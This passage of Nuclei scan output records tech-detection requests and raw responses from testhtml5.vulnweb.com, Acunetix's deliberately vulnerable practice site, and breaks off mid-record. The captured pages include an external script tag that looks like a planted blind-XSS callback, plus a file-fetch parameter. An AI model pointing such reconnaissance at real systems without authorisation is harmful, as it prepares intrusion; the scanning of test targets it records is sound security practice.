specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 whid/orf3 macaddress/64c901fd8856\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.734431759Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 whid/orf3 macaddress/64c901fd8856' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"angularjs\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.760646938Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.766825958Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.771993413Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.795469677Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 